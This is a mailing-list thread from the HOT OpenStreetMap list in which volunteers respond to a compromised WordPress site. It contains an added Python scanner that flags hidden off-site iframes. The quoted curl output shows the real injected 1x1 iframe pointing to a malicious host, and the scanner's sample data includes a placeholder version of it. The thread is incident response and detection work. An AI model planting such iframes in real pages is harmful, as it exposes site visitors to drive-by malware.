[HOT] Malware on hot.openstreetmap.org

Harry Wood mail at harrywood.co.uk
Mon Oct 24 17:23:50 BST 2011


I just shut down the site

We have access to the wordpress admin interface which allows us to 
install plugins. The installed code then has all kinds of access, so there are avenues open to us. I just installed the 'wp maintenance mode' plugin, which puts up a maintenance message to all visitors (except admin users) while we tackle the problem.

I also tried installing wp-malwatch plugin. This scans for various forms of malware, but it didn't find anything, perhaps because it's not up-to-date with this kind of exploit. 

Beyond that I guess we could install a breaking-all-security-models plugin to give me arbitrary access for viewing and changing files. Somebody know of such a dangerous plugin? I could try to write one myself.

but... 

The easy/sensible way to fix this would be to have the ssh and FTP 
access.  Mikel has those credentials, is he unreachable currently? I 
wonder if Robert Soden also has them?

Harry Wood
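Added example, not code from the thread or from any of the plugins mentioned: a small Python script that does the check Rodolphe's curl output below shows by hand (a 1x1 iframe pointing at an outside domain, injected at the site root rather than in the theme) and then walks a WordPress web root looking for the same pattern inside PHP and HTML files, including the index/config files a theme-only scan skips. The HTML, file contents and the attacker host `attacker.invalid` are constructed for the demo; the site host is passed in as a parameter.

```python
"""Flag hidden or off-site iframes in served HTML and in on-disk web files.

Added example for the HOT thread; all sample HTML and files below are
constructed and the attacker domain is a placeholder.
"""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag seen."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True when a width/height attribute makes the frame effectively invisible."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host):
    """Return [(src, reasons)] for iframes that look injected.

    Reasons: 'hidden' for 0/1-pixel frames, 'external' when the src host is
    not the site itself. Frames matching neither reason are not reported.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
            reasons.append("hidden")
        host = urlparse(src).hostname
        if host and host != site_host:
            reasons.append("external")
        if reasons:
            findings.append((src, reasons))
    return findings


# Matches a single iframe start tag; used on files so that a tag emitted from
# inside a PHP string (where a full-page parse would not see it) is still found.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)


def scan_tree(root, site_host, extensions=(".php", ".html", ".htm")):
    """Walk a web root and return {relative_path: [(src, reasons), ...]}."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            findings = []
            for match in IFRAME_RE.finditer(text):
                findings.extend(find_suspicious_iframes(match.group(0), site_host))
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits


# Constructed page modelled on the curl output quoted in the thread: a meta
# refresh to /weblog plus a 1x1 off-site iframe, and one legitimate frame.
SAMPLE_ROOT_HTML = """<html>
<head><META HTTP-EQUIV="refresh" content="0;URL=/weblog"></head>
<body><iframe src="http://attacker.invalid/showthread.php?t=1" width="1" height="1"></iframe>
<iframe src="http://hot.openstreetmap.org/weblog/widget" width="300" height="200"></iframe>
</body></html>
"""


def demo():
    """Build a constructed web root (one injected index.php, one clean theme
    file) in a temp directory and return the scan report."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    theme = os.path.join(root, "wp-content", "themes", "twentyten")
    os.makedirs(theme)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php\n// constructed: the iframe is written from PHP, so it never\n"
                 "// appears in the theme files Kate switched.\n"
                 "echo '<iframe src=\"http://attacker.invalid/x.php\" width=\"1\" height=\"1\"></iframe>';\n"
                 "header('Location: /weblog');\n")
    with open(os.path.join(theme, "footer.php"), "w") as fh:
        fh.write("<?php wp_footer(); ?>\n</body></html>\n")
    return scan_tree(root, "hot.openstreetmap.org")


if __name__ == "__main__":
    print(find_suspicious_iframes(SAMPLE_ROOT_HTML, "hot.openstreetmap.org"))
    print(demo())
```

For a live check, feed the body of `curl` of the site root into `find_suspicious_iframes`; for the on-disk pass, run `scan_tree` over the whole WordPress directory once shell or FTP access is available, since the tree walk is what a plugin running inside WordPress cannot be trusted to do on a compromised install.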




________________________________
From: Ariel Nunez <ingenieroariel at gmail.com>
To: Kate Chapman <kate at maploser.com>
Cc: hot at openstreetmap.org
Sent: Monday, 24 October 2011, 16:23
Subject: Re: [HOT] Malware on hot.openstreetmap.org


Kate,

If someone could hack it via FTP and add that, perhaps we can hack it too and remove it.

It actually sounds like fun.

Ariel.


On Mon, Oct 24, 2011 at 2:37 AM, Kate Chapman <kate at maploser.com> wrote:

>Unfortunately there does not appear to be a way I can fix this without
>having access to the actual server.
>
>Any suggestions?  My thought is to back-up the blog posts and move it
>to another wordpress instance.  That way then we could switch the DNS
>to the new server.
>
>-Kate
>
>On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville
><rodolphe at quiedeville.org> wrote:
>> On 24/10/2011 08:28, Kate Chapman wrote:
>>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
>>> missing something.
>>
>> The iframe is not on the /weblog/ pages; you can see it when you call the
>> root URL like this:
>>
>>
>> rodo at elz:~$ curl hot.openstreetmap.org
>> <html>
>> <head>
>> <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
>> </head>
>> <body><iframe
>> src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
>> width="1" height="1"></iframe>
>> <script type="text/javascript">
>> var gaJsHost = (("https:" == document.location.protocol) ?
>> "https://ssl." : "http://www.");
>> document.write(unescape("%3Cscript src='" + gaJsHost +
>> "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
>> </script>
>> <script type="text/javascript">
>> var pageTracker = _gat._getTracker("UA-5963453-1");
>> pageTracker._trackPageview();
>> </script>
>> </body>
>> </html>
>>
>> Have a look at the beginning of body part
>>
>> It's probably not in the theme part of Wordpress, but somewhere in the
>> config parts of the blog.
>>
>> Regards
>>
>>
>>
>>>
>>> -Kate
>>>
>>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
>>> <rodolphe at quiedeville.org> wrote:
>>>> Hi,
>>>>
>>>> Someone cracked the Wordpress installed on hot.openstreetmap.org and added
>>>> an iframe to:
>>>>
>>>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>>>
>>>> Edit the wordpress template, remove this iframe and it could resolve
>>>> the problem. The security alert occurs on Firefox too.
>>>>
>>>> Regards
>>>>
>>>>
>>>> On 23/10/2011 23:33, Kate Chapman wrote:
>>>>> Hi Floris,
>>>>>
>>>>> Yes, I know about the problem but haven't been able to fix it.  I think
>>>>> logging into the server might be necessary, but I think only Mikel has
>>>>> access.
>>>>>
>>>>> If anyone has other suggestions please help.
>>>>>
>>>>> Kate
>>>>>
>>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu> wrote:
>>>>>
>>>>>     I'm getting warnings from Chrome at the moment that
>>>>>     hot.openstreetmap.org is infected
>>>>>     with malware.
>>>>>
>>>>>     Anybody want to look into that?
>>>>>
>>>>>     Here's the google diagnose page for it:
>>>>>
>>>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>>>
>>>>>     Greetings,
>>>>>     Floris Looijesteijn
>>>>>
>>>>>     (tracing Van, Turkey)
>>>>>
>>>>>     _______________________________________________
>>>>>     HOT mailing list
>>>>>     HOT at openstreetmap.org
>>>>>     http://lists.openstreetmap.org/listinfo/hot
>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Rodolphe Quiédeville
>>>> http://cartosm.eu - Integration of free maps on websites
>>>> Blog : http://blog.rodolphe.quiedeville.org/
>>>> SIP/XMPP : rodolphe at quiedeville.org
>>>>
>>>>
>>
>>
>> --
>> Rodolphe Quiédeville
>> http://cartosm.eu - Integration of free maps on websites
>> Blog : http://blog.rodolphe.quiedeville.org/
>> SIP/XMPP : rodolphe at quiedeville.org
>>
>
>
